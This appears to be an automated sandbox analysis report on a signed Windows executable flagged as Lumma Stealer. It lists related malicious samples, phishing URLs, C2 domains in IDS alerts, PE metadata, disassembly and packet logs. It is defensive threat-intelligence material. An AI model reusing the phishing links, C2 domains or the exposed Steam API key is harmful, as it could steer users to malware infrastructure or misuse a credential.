	https://cocteldedeas.mx/rx567#cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29t	Get hash	malicious	HTMLPhisher	Browse	cocteldedeas.mx/rx567/
104.102.49.254	r4xiHKy8aM.exe	Get hash	malicious	Socks5Systemz	Browse	/ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
104.102.49.254	http://gtm-cn-j4g3qqvf603.steamproxy1.com/	Get hash	malicious	Unknown	Browse	www.valvesoftware.com/legal.htm

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
edge-block-www-env.dropbox-dns.com	SDIO_R773.exe	Get hash	malicious	LummaC	Browse	162.125.66.15
	vEtDFkAZjO.exe	Get hash	malicious	RL STEALER, StormKitty	Browse	162.125.66.15
	hnskdfgjgar22.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.65.15
	Setup.exe	Get hash	malicious	Unknown	Browse	162.125.69.15
	Setup.exe	Get hash	malicious	Unknown	Browse	162.125.69.15
	hnsadjhfg18De.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.15
	De17De16.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.15
	fghdsdf17.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.15
	hnghksdjfhs19De.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.15
	jhsdgfjkh236.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.15
steamcommunity.com	G7T8lHJWWM.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	92.255.57_2.112.ps1	Get hash	malicious	LummaC	Browse	104.102.49.254
	uo9m.exe	Get hash	malicious	LummaC	Browse	23.197.127.21
	uo9m.exe	Get hash	malicious	LummaC	Browse	23.50.98.133
	L7GNkeVm5e.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	NDWffRLk7z.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	g3toRYa6JE.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	lBb4XI4eGD.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	UWYXurYZ2x.exe	Get hash	malicious	LummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty Stealer	Browse	104.102.49.254
	TBI87y49f9.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
aleksandr-block.com	92.255.57_2.112.ps1	Get hash	malicious	LummaC	Browse	188.114.96.3
www-env.dropbox-dns.com	SDIO_R773.exe	Get hash	malicious	LummaC	Browse	162.125.66.18
	Message.eml	Get hash	malicious	Unknown	Browse	162.125.66.18
	https://docsend.com/view/sutbz9ibkqcisjtv	Get hash	malicious	Unknown	Browse	162.125.66.18
	Jeffparish.docx	Get hash	malicious	Unknown	Browse	162.125.66.18
	sEG2xXpg0X.xlsm	Get hash	malicious	Unknown	Browse	162.125.3.18
	Remittance details.docx	Get hash	malicious	Unknown	Browse	162.125.66.18
	Remittance details.docx	Get hash	malicious	Unknown	Browse	162.125.66.18
	vEtDFkAZjO.exe	Get hash	malicious	RL STEALER, StormKitty	Browse	162.125.66.15
	universityform.xlsm	Get hash	malicious	Unknown	Browse	162.125.66.18
	universityform.xlsm	Get hash	malicious	Unknown	Browse	162.125.66.18

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DROPBOXUS	SDIO_R773.exe	Get hash	malicious	LummaC	Browse	162.125.66.15
	Message.eml	Get hash	malicious	Unknown	Browse	162.125.1.20
	https://docsend.com/view/sutbz9ibkqcisjtv	Get hash	malicious	Unknown	Browse	162.125.66.18
	Jeffparish.docx	Get hash	malicious	Unknown	Browse	162.125.66.18
	sEG2xXpg0X.xlsm	Get hash	malicious	Unknown	Browse	162.125.3.18
	Remittance details.docx	Get hash	malicious	Unknown	Browse	162.125.66.18
	Remittance details.docx	Get hash	malicious	Unknown	Browse	162.125.66.18
	vEtDFkAZjO.exe	Get hash	malicious	RL STEALER, StormKitty	Browse	162.125.66.15
	universityform.xlsm	Get hash	malicious	Unknown	Browse	162.125.66.18
	universityform.xlsm	Get hash	malicious	Unknown	Browse	162.125.66.18
CLOUDFLARENETUS	009.vbe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	possible SPAM## Msig Insurance Europe Complete via-Sign Monday January 2025.msg	Get hash	malicious	Unknown	Browse	104.18.69.40
	92.255.57_2.112.ps1	Get hash	malicious	LummaC	Browse	188.114.96.3
	phishing.eml	Get hash	malicious	Phisher	Browse	188.114.96.3
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	https://tinyurl.com/286oc4ly	Get hash	malicious	Unknown	Browse	104.17.112.233
	http://hotpepperliberia.com	Get hash	malicious	Unknown	Browse	172.67.130.110
	https://email.lc.haxconsulting.com/c/eJx0k0tv4zgQhH-NdBk4kKgHrQMPdhI5mck78djJRaDIlsSYD4WkpLF__cJOsLvAZq_FLnbhQzWrBCdJS6-fh9_RaK9H9Muk6c9yE3LCCkjrLORGUaGJZGcd_cOMdoP0QrdnzKivt8pMGqzrRF_5fQ-EtqDZvqLOiVYDD4HEOMnxvMB5EoKiQlYKnKMtHLdv5i83BT5n4-tb-75JAbPHy6-p02-Mqp6KVv9LO9pyPE9ZwVKaZjlkgBjkRVEjHIIehTVagfakt4YPzAujw45EeRrF0RziBvIoyeskRxgwwlma0ajAPBQERSiL4jg55o2Ss2YOOYWszps4a5o6CtLoWwySdN73LkgWASoDVE7T9N-pAJXcTFoaymeOSmr3s3YQHGYDhSApG2GdrzRVECQXdyBkgHJJ_5GuqNsJ7QKUnzgEyYUGIbsvNY0644_656a874w-uqIs-lGk6Q-UFjiUrPpkKLQHq6kka1Q6vvq928YBWm7z65vVxHE3FgEq59i-jvvVs0xEw7L6_MK2IhvbP_TKJn77qF7k3TSixbC_V5cBWuI33j_fivpGtZOAqN0Zxga7eJCXr-uXzfMHlIcjgANevhv8USfN_ZM-L_Dhoeu38GTXt4sALYfFzheHl3LNy1VZjw8iQOU6QOWmvb3vrqbc9Y17WtynH9OVVkrF8qdedwDgHtt4eTkPpTn1ebm6Sd7eV-rWxvS93979kt02VOA7wwntRWisaIUm9SB3sxOQsLdmFBwskUA5M1oD88aGlvwv49CZwTIgJ_9MuHE2GbsDG3pyTPFtBE-YUdW31-YJ-Orvpo8E_RUAAP__dHE7Qw	Get hash	malicious	Unknown	Browse	104.17.113.39
	http://bebizicon.com/Campususa/index.xml#?email=b2xpdmllci5kb3phdEBpbm5vY2FwLmNvbQ==	Get hash	malicious	EvilProxy, HTMLPhisher	Browse	172.67.74.152
	https://fsgospefx6g2.sg.larksuite.com/wiki/Y7ybwFESRiirQPkoARZlhCyVgFb?	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
AKAMAI-ASUS	G7T8lHJWWM.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	possible SPAM## Msig Insurance Europe Complete via-Sign Monday January 2025.msg	Get hash	malicious	Unknown	Browse	23.47.168.24
	92.255.57_2.112.ps1	Get hash	malicious	LummaC	Browse	104.102.49.254
	https://fsgospefx6g2.sg.larksuite.com/wiki/Y7ybwFESRiirQPkoARZlhCyVgFb?	Get hash	malicious	HTMLPhisher	Browse	2.19.126.80
	https://staemcomnunlty.com/glft/91832	Get hash	malicious	Unknown	Browse	2.19.126.91
	https://fsgospefx6g2.sg.larksuite.com/wiki/Y7ybwFESRiirQPkoARZlhCyVgFb?	Get hash	malicious	HTMLPhisher	Browse	2.19.126.83
	uo9m.exe	Get hash	malicious	LummaC	Browse	23.50.98.133
	https://timecusa-my.sharepoint.com/:f:/p/stephensw/Erq5TMDIJBVBvh6vbWmpurEB4UwHKTW8nzSkPE2Ckmvugg?e=SepTcT	Get hash	malicious	HTMLPhisher	Browse	2.19.126.84
	Handler.exe	Get hash	malicious	DanaBot, Vidar	Browse	23.40.179.46
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	Unknown	Browse	2.19.126.75
DROPBOXUS	SDIO_R773.exe	Get hash	malicious	LummaC	Browse	162.125.66.15
	Message.eml	Get hash	malicious	Unknown	Browse	162.125.1.20
	https://docsend.com/view/sutbz9ibkqcisjtv	Get hash	malicious	Unknown	Browse	162.125.66.18
	Jeffparish.docx	Get hash	malicious	Unknown	Browse	162.125.66.18
	sEG2xXpg0X.xlsm	Get hash	malicious	Unknown	Browse	162.125.3.18
	Remittance details.docx	Get hash	malicious	Unknown	Browse	162.125.66.18
	Remittance details.docx	Get hash	malicious	Unknown	Browse	162.125.66.18
	vEtDFkAZjO.exe	Get hash	malicious	RL STEALER, StormKitty	Browse	162.125.66.15
	universityform.xlsm	Get hash	malicious	Unknown	Browse	162.125.66.18
	universityform.xlsm	Get hash	malicious	Unknown	Browse	162.125.66.18

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	G7T8lHJWWM.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 162.125.66.18 162.125.66.15 188.114.96.3
	92.255.57_2.112.ps1	Get hash	malicious	LummaC	Browse	104.102.49.254 162.125.66.18 162.125.66.15 188.114.96.3
	8e8JUOzOjR.exe	Get hash	malicious	DBatLoader	Browse	104.102.49.254 162.125.66.18 162.125.66.15 188.114.96.3
	UTstKgkJNY.exe	Get hash	malicious	DBatLoader	Browse	104.102.49.254 162.125.66.18 162.125.66.15 188.114.96.3
	On9ahUpI4R.exe	Get hash	malicious	DBatLoader	Browse	104.102.49.254 162.125.66.18 162.125.66.15 188.114.96.3
	JDQS879kiy.exe	Get hash	malicious	DBatLoader	Browse	104.102.49.254 162.125.66.18 162.125.66.15 188.114.96.3
	UAHIzSm2x2.exe	Get hash	malicious	DBatLoader	Browse	104.102.49.254 162.125.66.18 162.125.66.15 188.114.96.3
	LbZ88q4uPa.exe	Get hash	malicious	DBatLoader	Browse	104.102.49.254 162.125.66.18 162.125.66.15 188.114.96.3
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.102.49.254 162.125.66.18 162.125.66.15 188.114.96.3
	183643586-388657435.07.exe	Get hash	malicious	Unknown	Browse	104.102.49.254 162.125.66.18 162.125.66.15 188.114.96.3

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\VMB7R5ASJ9ZHN3G5.exe

Download File

Process:	C:\Users\user\Desktop\k7h8uufe6Y.exe
File Type:	HTML document, ASCII text, with very long lines (410)
Category:	dropped
Size (bytes):	1005
Entropy (8bit):	4.9698836036542575
Encrypted:	false
SSDEEP:	24:hYjkspFAunWDg5+DCpdgc6olL3lX8YDUdwlKXG/PEuXW:4plVl68lL14
MD5:	1E8AC4ADD8592CABAA50DFB8581608D2
SHA1:	EBE49951ACE4227AB233D9FD6218A9D8907118B8
SHA-256:	83622A0678D9F991CE9E6F9F2690A93504E2FC58128156C4C4B2358B372572ED
SHA-512:	8A3F7BADCF10D38D9545174651CDE383F5C035578C9D3D451DB2FFF8CC73907582EA1B233BB9F68FA988B5D615A601ECB12ECC735D7645725A7F489AB5A15696
Malicious:	false
Reputation:	low
Preview:	<!DOCTYPE html>.<html>.<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">.<meta name="viewport" content="width=device-width, initial-scale=1" />.<title>Dropbox - 400</title>.<link href="https://cfl.dropboxstatic.com/static/metaserver/static/css/error.css" rel="stylesheet" type="text/css"/>.<link rel="shortcut icon" href="https://cfl.dropboxstatic.com/static/images/favicon.ico"/>.</head>.<body>.<div class="figure">.<img src="https://assets.dropbox.com/www/en-us/illustrations/spot/target-miss.svg" alt="Error: 400"/>.</div>.<div id="errorbox">.<h1>Error (400)</h1>Something went wrong. Don't worry, your files are still safe and the Dropbox team has been notified. Check out our <a href="https://status.dropbox.com">Status Page</a> to see if there is a known incident, our <a href="https://www.dropbox.com/help">Help Center</a> and <a href="https://forums.dropbox.com">forums</a> for help, or head back to <a href="https://www.dropbox.com/home">home</a>..</div>..</body>.</h

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Users\user\Desktop\k7h8uufe6Y.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.462935292054706
Encrypted:	false
SSDEEP:	6144:uIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uN2dwBCswSbn:jXD94+WlLZMM6YFHg+n
MD5:	50222DF810E83B72134517262F25A0E0
SHA1:	E662ECBBB9BCE87FED3E5A6333E69C44D87B74D3
SHA-256:	1AABED89D7D3F9BEC7017A4B4EB7AA757FDB3E40CD4808D8AFD53CB44110E7AE
SHA-512:	BD5FDF211E29967B3CD75E127C250280534DC4BFDECC6B10D74B2B1130C7D31C7E3FD083BC9DDF411E935D5CCB055C9F9A97AA5A5CE278365467EF3D26142CF9
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...Yf..............................................................................................................................................................................................................................................................................................................................................Q0..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.994346992255163
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	k7h8uufe6Y.exe
File size:	8'460'624 bytes
MD5:	afcc99e595001bea3807d99e9811e94a
SHA1:	c4115e70f98e3905bd7ec1b63281302ed40b9c0c
SHA256:	942d9e96f053c02c029afd39ec71386285190e972457be9d8e0d310c4c5b4f28
SHA512:	0b95d6ec9ab4630141a006f7de79abe129575fe92a36b6029622a43ba86f650f8486af93340c62556bb97d4e31cb61463e3202cda98a98fda8d0d295fb121091
SSDEEP:	196608:uDosaMOqymYug2/pf0kA6Dp6MAzZX0ILNdz:ufaMImtg2xfD3MMAFldz
TLSH:	068633C2CE6C28C4CE281437A1DE5FA5C6062A9D51D8C75F250ADFD65F06ECC8EAA353
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d)u. H.. H.. H...T..,H...n...H...h..)H...@F.%H.. H...H...n..%H...N..!H..Rich H..................PE..L....k.M...................

File Icon


Icon Hash:	274db4a6a7d5390b

Static PE Info

General

Entrypoint:	0x404481
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x4DC56B91 [Sat May 7 15:56:01 2011 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	1e8d1dd0f783e927c20be08873b1a68c

Authenticode Signature

Signature Valid:	true
Signature Issuer:	CN=Certum Extended Validation Code Signing 2021 CA, O=Asseco Data Systems S.A., C=PL
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	26/11/2024 12:07:48 26/11/2025 12:07:47
Subject Chain	CN=T H SUPPORT SERVICES LTD, O=T H SUPPORT SERVICES LTD, STREET=Suites 10s And 11s Trafford House Chester Road, PostalCode=M32 0RS, L=Stretford, S=Greater Manchester, C=GB, SERIALNUMBER=07890919, OID.1.3.6.1.4.1.311.60.2.1.3=GB, OID.2.5.4.15=Private Organization
Version:	3
Thumbprint MD5:	99CC43DD50C8C235E6703FBFE86B0302
Thumbprint SHA-1:	21297766029D043DFBA740CD5203E45171FC8EAA
Thumbprint SHA-256:	0A2CAAF3A1E6490DE521CCCA8452705AF0BD9A4A91D7F02CD8D3588404BCF77C
Serial:	502F183B00B497DFC821D09DEB30526B

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 00409350h
push 00405CECh
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 58h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
call dword ptr [00409024h]
xor edx, edx
mov dl, ah
mov dword ptr [0040DF50h], edx
mov ecx, eax
and ecx, 000000FFh
mov dword ptr [0040DF4Ch], ecx
shl ecx, 08h
add ecx, edx
mov dword ptr [0040DF48h], ecx
shr eax, 10h
mov dword ptr [0040DF44h], eax
xor esi, esi
push esi
call 00007F19A4E4A06Ah
pop ecx
test eax, eax
jne 00007F19A4E489BAh
push 0000001Ch
call 00007F19A4E48A65h
pop ecx
mov dword ptr [ebp-04h], esi
call 00007F19A4E49D35h
call dword ptr [00409038h]
mov dword ptr [0040F478h], eax
call 00007F19A4E49BF3h
mov dword ptr [0040DF2Ch], eax
call 00007F19A4E4999Ch
call 00007F19A4E498DEh
call 00007F19A4E495FBh
mov dword ptr [ebp-30h], esi
lea eax, dword ptr [ebp-5Ch]
push eax
call dword ptr [00409034h]
call 00007F19A4E4986Fh
mov dword ptr [ebp-64h], eax
test byte ptr [ebp-30h], 00000001h
je 00007F19A4E489B8h
movzx eax, word ptr [ebp-2Ch]
jmp 00007F19A4E489B5h
push 0000000Ah
pop eax
push eax
push dword ptr [ebp-64h]
push esi
push esi
call dword ptr [00409030h]

Rich Headers

Programming Language:

[ C ] VS98 (6.0) SP6 build 8804
[C++] VS98 (6.0) SP6 build 8804
[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x96e4	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x10000	0x801000	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x80f000	0x2950
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9000	0xe4	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x7928	0x8000	604b2b06332b5d85318531bc6f884ac5	False	0.611175537109375	data	6.561418648996693	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9000	0xbc4	0x1000	84ba4aa11b99343b5966466b2d578e6f	False	0.33837890625	data	4.070139716390423	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x547c	0x4000	25b626ea05b1ff43edf00c311ff20429	False	0.13543701171875	data	1.6916739371015412	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x10000	0x801000	0x801000	1866037d0be01a42947c981b82c56b64	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
COMPRESSED	0x10288	0x7a2649	data	English	United States	1.0002803802490234
RT_ICON	0x7b28d4	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	United States	0.627132196162047
RT_ICON	0x7b377c	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	United States	0.7572202166064982
RT_ICON	0x7b4024	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	United States	0.736271676300578
RT_ICON	0x7b458c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	United States	0.5322614107883817
RT_ICON	0x7b6b34	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	United States	0.6393058161350844
RT_ICON	0x7b7bdc	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	United States	0.7668439716312057
RT_GROUP_ICON	0x7b8044	0x5a	data	English	United States	0.7
RT_VERSION	0x7b80a0	0x358	data	English	United States	0.45794392523364486
RT_MANIFEST	0x7b83f8	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL

Import

KERNEL32.dll

WinExec, FreeResource, SizeofResource, LockResource, CreateDirectoryA, GetTempPathA, LoadResource, FindResourceA, GetVersionExA, GetVersion, GetStringTypeA, LCMapStringW, GetModuleHandleA, GetStartupInfoA, GetCommandLineA, ExitProcess, HeapAlloc, HeapFree, GetLastError, CloseHandle, WriteFile, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, GetModuleFileNameA, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount, GetStdHandle, GetFileType, GetEnvironmentVariableA, HeapDestroy, HeapCreate, VirtualFree, RtlUnwind, VirtualAlloc, HeapReAlloc, SetStdHandle, FlushFileBuffers, SetFilePointer, CreateFileA, GetCPInfo, GetACP, GetOEMCP, GetProcAddress, LoadLibraryA, SetEndOfFile, ReadFile, MultiByteToWideChar, LCMapStringA, GetStringTypeW

USER32.dll

MessageBoxA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-14T08:55:30.725884+0100	2059209	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shoefeatthe .lat)	1	192.168.2.4	57981	1.1.1.1	53	UDP
2025-01-14T08:55:30.742563+0100	2059189	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bloodyswif .lat)	1	192.168.2.4	53856	1.1.1.1	53	UDP
2025-01-14T08:55:30.756217+0100	2059211	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (washyceehsu .lat)	1	192.168.2.4	50889	1.1.1.1	53	UDP
2025-01-14T08:55:30.769692+0100	2059201	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (leggelatez .lat)	1	192.168.2.4	51038	1.1.1.1	53	UDP
2025-01-14T08:55:30.781551+0100	2059203	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (miniatureyu .lat)	1	192.168.2.4	61267	1.1.1.1	53	UDP
2025-01-14T08:55:30.792946+0100	2059199	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (kickykiduz .lat)	1	192.168.2.4	55019	1.1.1.1	53	UDP
2025-01-14T08:55:30.804464+0100	2059207	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (savorraiykj .lat)	1	192.168.2.4	64348	1.1.1.1	53	UDP
2025-01-14T08:55:30.817886+0100	2059191	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (finickypwk .lat)	1	192.168.2.4	51897	1.1.1.1	53	UDP
2025-01-14T08:55:31.529066+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49733	104.102.49.254	443	TCP
2025-01-14T08:55:32.167195+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.4	49733	104.102.49.254	443	TCP
2025-01-14T08:55:32.904742+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49736	188.114.96.3	443	TCP
2025-01-14T08:55:33.334584+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49736	188.114.96.3	443	TCP
2025-01-14T08:55:33.334584+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49736	188.114.96.3	443	TCP
2025-01-14T08:55:33.859115+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49739	188.114.96.3	443	TCP
2025-01-14T08:55:34.339184+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49739	188.114.96.3	443	TCP
2025-01-14T08:55:34.339184+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49739	188.114.96.3	443	TCP
2025-01-14T08:55:35.259533+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49741	188.114.96.3	443	TCP
2025-01-14T08:55:36.553310+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49743	188.114.96.3	443	TCP
2025-01-14T08:55:37.016310+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49743	188.114.96.3	443	TCP
2025-01-14T08:55:37.938188+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49744	188.114.96.3	443	TCP
2025-01-14T08:55:39.335375+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49745	188.114.96.3	443	TCP
2025-01-14T08:55:40.703145+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49746	188.114.96.3	443	TCP
2025-01-14T08:55:43.243713+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49747	188.114.96.3	443	TCP
2025-01-14T08:55:43.688888+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49747	188.114.96.3	443	TCP
2025-01-14T08:55:44.343650+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49748	162.125.66.18	443	TCP
2025-01-14T08:55:45.867570+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49749	162.125.66.15	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2025 08:55:30.841152906 CET	49733	443	192.168.2.4	104.102.49.254
Jan 14, 2025 08:55:30.841183901 CET	443	49733	104.102.49.254	192.168.2.4
Jan 14, 2025 08:55:30.841245890 CET	49733	443	192.168.2.4	104.102.49.254
Jan 14, 2025 08:55:30.893742085 CET	49733	443	192.168.2.4	104.102.49.254
Jan 14, 2025 08:55:30.893781900 CET	443	49733	104.102.49.254	192.168.2.4
Jan 14, 2025 08:55:31.528985023 CET	443	49733	104.102.49.254	192.168.2.4
Jan 14, 2025 08:55:31.529066086 CET	49733	443	192.168.2.4	104.102.49.254
Jan 14, 2025 08:55:31.533138990 CET	49733	443	192.168.2.4	104.102.49.254
Jan 14, 2025 08:55:31.533162117 CET	443	49733	104.102.49.254	192.168.2.4
Jan 14, 2025 08:55:31.533436060 CET	443	49733	104.102.49.254	192.168.2.4
Jan 14, 2025 08:55:31.620090961 CET	49733	443	192.168.2.4	104.102.49.254
Jan 14, 2025 08:55:31.668935061 CET	49733	443	192.168.2.4	104.102.49.254
Jan 14, 2025 08:55:31.715331078 CET	443	49733	104.102.49.254	192.168.2.4
Jan 14, 2025 08:55:32.167103052 CET	443	49733	104.102.49.254	192.168.2.4
Jan 14, 2025 08:55:32.167131901 CET	443	49733	104.102.49.254	192.168.2.4
Jan 14, 2025 08:55:32.167140961 CET	443	49733	104.102.49.254	192.168.2.4
Jan 14, 2025 08:55:32.167155027 CET	443	49733	104.102.49.254	192.168.2.4
Jan 14, 2025 08:55:32.167161942 CET	443	49733	104.102.49.254	192.168.2.4
Jan 14, 2025 08:55:32.167193890 CET	49733	443	192.168.2.4	104.102.49.254
Jan 14, 2025 08:55:32.167222977 CET	443	49733	104.102.49.254	192.168.2.4
Jan 14, 2025 08:55:32.167263031 CET	49733	443	192.168.2.4	104.102.49.254
Jan 14, 2025 08:55:32.167306900 CET	49733	443	192.168.2.4	104.102.49.254
Jan 14, 2025 08:55:32.262331963 CET	443	49733	104.102.49.254	192.168.2.4
Jan 14, 2025 08:55:32.262346029 CET	443	49733	104.102.49.254	192.168.2.4
Jan 14, 2025 08:55:32.262403965 CET	443	49733	104.102.49.254	192.168.2.4
Jan 14, 2025 08:55:32.262478113 CET	49733	443	192.168.2.4	104.102.49.254
Jan 14, 2025 08:55:32.262506962 CET	443	49733	104.102.49.254	192.168.2.4
Jan 14, 2025 08:55:32.262523890 CET	49733	443	192.168.2.4	104.102.49.254
Jan 14, 2025 08:55:32.262557030 CET	49733	443	192.168.2.4	104.102.49.254
Jan 14, 2025 08:55:32.267260075 CET	443	49733	104.102.49.254	192.168.2.4
Jan 14, 2025 08:55:32.267335892 CET	49733	443	192.168.2.4	104.102.49.254
Jan 14, 2025 08:55:32.267345905 CET	443	49733	104.102.49.254	192.168.2.4
Jan 14, 2025 08:55:32.267369032 CET	443	49733	104.102.49.254	192.168.2.4
Jan 14, 2025 08:55:32.267402887 CET	49733	443	192.168.2.4	104.102.49.254
